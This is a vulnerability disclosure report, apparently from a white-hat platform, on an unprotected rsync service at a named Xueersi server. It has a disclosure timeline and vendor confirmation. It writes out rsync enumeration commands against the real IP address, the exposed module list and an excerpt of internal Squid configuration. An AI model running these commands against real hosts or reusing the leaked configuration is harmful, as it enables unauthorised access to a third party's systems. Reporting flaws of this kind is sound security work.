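2015-03-09: Details reported to the vendor; awaiting vendor handling
2015-03-10: Vendor confirmed; details disclosed to the vendor only
2015-03-20: Details disclosed to core white hats and experts in related fields
2015-03-30: Details disclosed to regular white hats
2015-04-09: Details disclosed to intern white hats
2015-04-23: Details disclosed to the public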
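An rsync service has no proper access control, so its files can be accessed.
I searched Google for this IP address to confirm that it is a Xueersi server: http://115.182.69.104/icsquiz/cocoslin2/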
➜ rsync 115.182.69.104::
xes_3d_employeewangyangtestmsiwuhanicsServerics3_icsquizics2_icsquizics3_videoSquid_soft
------------------------------------------
➜ rsync 115.182.69.104::Squid_soft
drwxr-xr-x 4096 2014/06/17 11:21:54 .
drwxr-xr-x 4096 2014/06/17 15:29:57 conf
drwxr-xr-x 4096 2014/06/18 10:55:01 scripts
drwxr-xr-x 4096 2014/06/18 10:37:30 software
drwxr-xr-x 4096 2014/06/18 15:54:12 system_conf
cat squid/squid.conf
......
acl all src 0.0.0.0/0.0.0.0
acl manager proto cache_object
acl localhost src 127.0.0.1/255.255.255.255
acl to_localhost dst 127.0.0.0/8
acl icsinterface dst 59.151.117.145/255.255.255.255
acl SSL_ports port 443 563
acl Safe_ports port 80 # http
acl Safe_ports port 6080 # ics interface
acl Safe_ports port 8080 # http
acl Safe_ports port 3128 # http
acl Safe_ports port 21 # ftp
acl Safe_ports port 443 563 # https, snews
acl Safe_ports port 70 # gopher
acl Safe_ports port 210 # wais
acl Safe_ports port 1025-65535 # unregistered ports
acl Safe_ports port 280 # http-mgmt
acl Safe_ports port 488 # gss-http
acl Safe_ports port 591 # filemaker
acl Safe_ports port 777 # multiling http
acl CONNECT method CONNECT
acl PURGE method PURGE
acl req_domain dstdomain .xueersi.com .xueersi.net .xueersi.org .eduu.com .eduu.cn .eduuu.com .mimio.com .mobby.cn .sinaimg.cn .jiajiaoban.com .aoshu.com .youjiao.com .bj.zhongkao.com .gaokao.com .yingyu.com .zuowen.com .liuxue.com .yuer.com .speiyou.com .speiyou.cn .263.net .ip138.com .100tal.com .263.com .zhiyinlou.com
......
Restrict external access to rsync.
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-03-10 10:00
Thanks, we are fixing it.
None yet